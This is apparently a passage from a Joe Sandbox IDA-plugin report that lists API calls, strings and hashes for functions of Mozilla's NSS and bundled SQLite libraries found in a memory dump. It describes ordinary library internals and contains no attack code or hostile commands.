memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5DC9E5
free.MOZGLUE(00000000), ref: 6C5DCA5A

Strings

FC_GetFunctionList, xrefs: 6C5DC098
NSC_ModuleDBFunc, xrefs: 6C5DC0FC
NSC_GetFunctionList, xrefs: 6C5DC093
NSS_ReturnModuleSpecData, xrefs: 6C5DC275
NSS_DISABLE_UNLOAD, xrefs: 6C5DC7B0
Vendor NSS FIPS Interface, xrefs: 6C5DC34A
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C5DC38D
NSS_FORCE_TOKEN_LOCK, xrefs: 6C5DC77D
PKCS 11, xrefs: 6C5DC2F9, 6C5DC314
NSC_GetInterface, xrefs: 6C5DC04F
FC_GetInterface, xrefs: 6C5DC054
nss_mod_log, xrefs: 6C5DC3CC

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 43f1641be01539a6a1c176d2a81ffe283f512cb745d1020482cbf5a9b0e65171
Instruction ID: 4f5e2c0f00dc1d3916766f453236ff6d203eacd9afdf6d3bc836b8f65bd60a2c
Opcode Fuzzy Hash: 43f1641be01539a6a1c176d2a81ffe283f512cb745d1020482cbf5a9b0e65171
Instruction Fuzzy Hash: 894258F2B003049BDB00DF99DC8AB5A3BB5BB46348F16406DD8059BB21EB31F955CB99

Function 6C6B3FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C6B3FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6B3FFE
malloc.MOZGLUE(-00000003), ref: 6C6B4016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6EFC62), ref: 6C6B404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B40A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B40D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4112
malloc.MOZGLUE(00000000), ref: 6C6B411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C6B414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4160
free.MOZGLUE(?), ref: 6C6B416C
malloc.MOZGLUE(?), ref: 6C6B41AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C6B41EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C6B4520), ref: 6C6B4244
GetEnvironmentStrings.KERNEL32 ref: 6C6B424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B42B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B42E4
malloc.MOZGLUE(00000002), ref: 6C6B42FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C6B4342
GetStdHandle.KERNEL32(000000F6), ref: 6C6B43AB
GetStdHandle.KERNEL32(000000F5), ref: 6C6B43B2
GetStdHandle.KERNEL32(000000F4), ref: 6C6B43B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C6B4403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4410

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C6B445E
CloseHandle.KERNEL32(?), ref: 6C6B446B
free.MOZGLUE(?), ref: 6C6B4482
free.MOZGLUE(00000000), ref: 6C6B4492
free.MOZGLUE(00000000), ref: 6C6B44A4
GetLastError.KERNEL32 ref: 6C6B44B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C6B44BE
free.MOZGLUE(?), ref: 6C6B44C7
free.MOZGLUE(00000000), ref: 6C6B44D5
free.MOZGLUE(00000000), ref: 6C6B44EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6C6B41E9
D, xrefs: 6C6B4396
=, xrefs: 6C6B44F8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 076c0b7a57ad045ff5a2f456c4130d5122462f4a079c6f1472a1e064aa47b2ff
Instruction ID: 4911a97d7b45714bb7c09209876c5716c0338aa474c09a331d4375ffac595b85
Opcode Fuzzy Hash: 076c0b7a57ad045ff5a2f456c4130d5122462f4a079c6f1472a1e064aa47b2ff
Instruction Fuzzy Hash: 7802F871E053119FEB108F69C8807BEBBB5AF16308F244129DC6AB7741D7B1E825CB99

Function 6C5C6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C6CA8EC,0000006C), ref: 6C5C6DC6
memcpy.VCRUNTIME140(?,6C6CA958,0000006C), ref: 6C5C6DDB
memcpy.VCRUNTIME140(?,6C6CA9C4,00000078), ref: 6C5C6DF1
memcpy.VCRUNTIME140(?,6C6CAA3C,0000006C), ref: 6C5C6E06
memcpy.VCRUNTIME140(?,6C6CAAA8,00000060), ref: 6C5C6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C6E38

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C5C6E76
TlsGetValue.KERNEL32 ref: 6C5C726F
EnterCriticalSection.KERNEL32(?), ref: 6C5C7283

Strings

!, xrefs: 6C5C7123

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 0cd8b2ba794369135539c946b4cab23e81741e0f0116ce0ece735955657d9501
Instruction ID: 1258ab759bc6e55fc5b66cf77c38fc07e91f16bfd82fdd6951a519d4ca7cca38
Opcode Fuzzy Hash: 0cd8b2ba794369135539c946b4cab23e81741e0f0116ce0ece735955657d9501
Instruction Fuzzy Hash: 08728DB5E052199FDB60DF68CC8879ABBB5EB49304F1041EDD80DA7701EB319A84CF92

Function 6C533C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C533D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C534052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C53410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C53449C

Strings

%s at line %d of [%.10s], xrefs: 6C534495, 6C5344F9, 6C53459E, 6C534769, 6C534809
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C534452, 6C534486, 6C5344EA, 6C534571, 6C534580, 6C53458F, 6C53475A, 6C5347FA
database corruption, xrefs: 6C534490, 6C5344F4, 6C534599, 6C534764, 6C534804

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: ad17a1cb0f01b815709bfcabc6d6744ec9c11156462e353223e23cc74563f1f5
Instruction ID: 6ac0938b1bea0830f08bfb4bb47a48384971e89f1fd21102009d5643ab305f06
Opcode Fuzzy Hash: ad17a1cb0f01b815709bfcabc6d6744ec9c11156462e353223e23cc74563f1f5
Instruction Fuzzy Hash: 9A829475A00225CFCB04CF69C880B9D7BF1BF89318F2555A9D909ABB51E732EC42CB95

Function 6C60AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C60ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C60ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C60ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C60AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C60ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60ADF0

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C60B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C60B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C60B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C60B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C60B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60B40C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: ff25f1e4c1894cd89fe45137c25de40aa6ae4acfaf7b587f29e31c253f4e89ab
Instruction ID: f20452340a6bf584eae67b8c4fc25017e2e29c4e53820fb6f92f7bd980d8dbf1
Opcode Fuzzy Hash: ff25f1e4c1894cd89fe45137c25de40aa6ae4acfaf7b587f29e31c253f4e89ab
Instruction Fuzzy Hash: E222A071A04301AFE714CF14CD40B9A77E1AF8430CF24857CE9596B7A2E772E859CB9A

Function 6C551F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5525F3

Strings

multiple recursive references: %s, xrefs: 6C5522E0
recursive reference in a subquery: %s, xrefs: 6C5522E5
H, xrefs: 6C55322D
no such table: %s, xrefs: 6C5526AC
no such index: "%s", xrefs: 6C55319D
unsafe use of virtual table "%s", xrefs: 6C5530D1
%s.%s, xrefs: 6C552D68
cannot join using column %s - column not present in both tables, xrefs: 6C5532AB
'%s' is not a function, xrefs: 6C552FD2
table %s has %d values for %d columns, xrefs: 6C55316C
H, xrefs: 6C55329F
%s.%s.%s, xrefs: 6C55302D
too many references to "%s": max 65535, xrefs: 6C552FB6
no tables specified, xrefs: 6C5526BE
a NATURAL join may not have an ON or USING clause, xrefs: 6C5532C1
cannot have both ON and USING clauses in the same join, xrefs: 6C5532B5
too many columns in result set, xrefs: 6C553012
access to view "%s" prohibited, xrefs: 6C552F4A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: f171b006c0dcd9b5785afba526bda94025831cc0076bdae94495e94e83539fa0
Instruction ID: 4aae9a17322ba968f48e2296fcb00104bc0ed80d0fa4255e9b66cf89e912e51d
Opcode Fuzzy Hash: f171b006c0dcd9b5785afba526bda94025831cc0076bdae94495e94e83539fa0
Instruction Fuzzy Hash: 2FD28F74E04209CFDB04CF95CC94B9DB7B1FF89308F68816AD819ABB52D731A856CB50

Function 6C58ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C58ED38

Part of subcall function 6C524F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C524FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C58EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C58EFE4

Part of subcall function 6C64DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C525001,?,00000003,00000000), ref: 6C64DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C58F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C58F129
sqlite3_mprintf.NSS3(optimize), ref: 6C58F1D1
sqlite3_free.NSS3(?), ref: 6C58F368

Strings

snippet, xrefs: 6C58EF05, 6C58EF37, 6C58EF7C
fts4, xrefs: 6C58F2AD
fts4aux, xrefs: 6C58ECF9
fts3tokenize, xrefs: 6C58F30F
unicode61, xrefs: 6C58EDB5
fts3, xrefs: 6C58F247
optimize, xrefs: 6C58F199, 6C58F1CC, 6C58F211
simple, xrefs: 6C58ED79
fts3_tokenizer, xrefs: 6C58EE1A, 6C58EEA8
offsets, xrefs: 6C58EFAF, 6C58EFDF, 6C58F01F
matchinfo, xrefs: 6C58F04F, 6C58F082, 6C58F0C2, 6C58F0F2, 6C58F124, 6C58F169
porter, xrefs: 6C58ED97

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 01eaa1d7ea45043a21d1883af7745a491d97f1d41e49535b01901dc3cb69ba4b
Instruction ID: adb409122521a03fdf3cf34af91477346d28da46ed83a7efa07b9173c7d2bbed
Opcode Fuzzy Hash: 01eaa1d7ea45043a21d1883af7745a491d97f1d41e49535b01901dc3cb69ba4b
Instruction Fuzzy Hash: 5A02E1B5B053108BE7049F31AC8572B36B2BFC9708F148A3CD85A97B41EF74E8468796

Function 6C607C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C607C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C607C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C607D1E

Part of subcall function 6C607870: SECOID_FindOID_Util.NSS3(?,?,?,6C6091C5), ref: 6C60788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C607D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C607D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C607DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C607DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C607DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C607E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C607E58

Part of subcall function 6C607870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6091C5), ref: 6C6078BB
Part of subcall function 6C607870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C6091C5), ref: 6C6078FA
Part of subcall function 6C607870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C607930
Part of subcall function 6C607870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C607951
Part of subcall function 6C607870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C607964
Part of subcall function 6C607870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C60797A
Part of subcall function 6C607870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C607988
Part of subcall function 6C607870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C607998
Part of subcall function 6C607870: free.MOZGLUE(00000000), ref: 6C6079A7
Part of subcall function 6C607870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C6079BB
Part of subcall function 6C607870: PR_GetCurrentThread.NSS3(?,?,?,?,6C6091C5), ref: 6C6079CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C607E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C607F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C607F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C607FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C607FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C608038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C608050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C608093
SECOID_FindOID_Util.NSS3 ref: 6C607F29

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C608072
SECOID_FindOID_Util.NSS3 ref: 6C6080F5

Part of subcall function 6C60BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C60800A,00000000,?,00000000,?), ref: 6C60BC3F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 19a9e43261c995d3b04c83c350f785470b64be68322fdab98767ff2bcdcc6570
Instruction ID: 2146c7b8723740bfcab405e7584ba16b1c10b2e33a79c2885faf9db09e9d3784
Opcode Fuzzy Hash: 19a9e43261c995d3b04c83c350f785470b64be68322fdab98767ff2bcdcc6570
Instruction Fuzzy Hash: E1E1A0707053009FD708CF28DA80B5B77E5AF89308F14496DE98AABB61E731EC15CB5A

Function 6C591C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C591C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C591C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C591CA1
GetLengthSid.ADVAPI32(?), ref: 6C591CA9
malloc.MOZGLUE(00000000), ref: 6C591CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C591CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C591CE4
GetLengthSid.ADVAPI32(?), ref: 6C591CEC
malloc.MOZGLUE(00000000), ref: 6C591CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C591D0F
CloseHandle.KERNEL32(?), ref: 6C591D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C591D4D
GetLastError.KERNEL32 ref: 6C591D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C591D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C591D7A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 9a13272f2321a34b37740b6b7901b762c858190ffcc884328333ee4b1fed4f3d
Instruction ID: c9f2d5d48a8e5cf433564193a698d7ef5b34359a76eaa51829536c2eeab844d7
Opcode Fuzzy Hash: 9a13272f2321a34b37740b6b7901b762c858190ffcc884328333ee4b1fed4f3d
Instruction Fuzzy Hash: 353168B5600218AFDF20DF65DC88BAA7BB9FF49344F004165F51992550EB305994CF5D

Function 6C593D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C593DFB
__allrem.LIBCMT ref: 6C593EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C593FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C594047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5940DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C59415F
__allrem.LIBCMT ref: 6C59416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C594288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5942AB
__allrem.LIBCMT ref: 6C5942B7

Strings

%02d, xrefs: 6C594086
%03d, xrefs: 6C5942E8
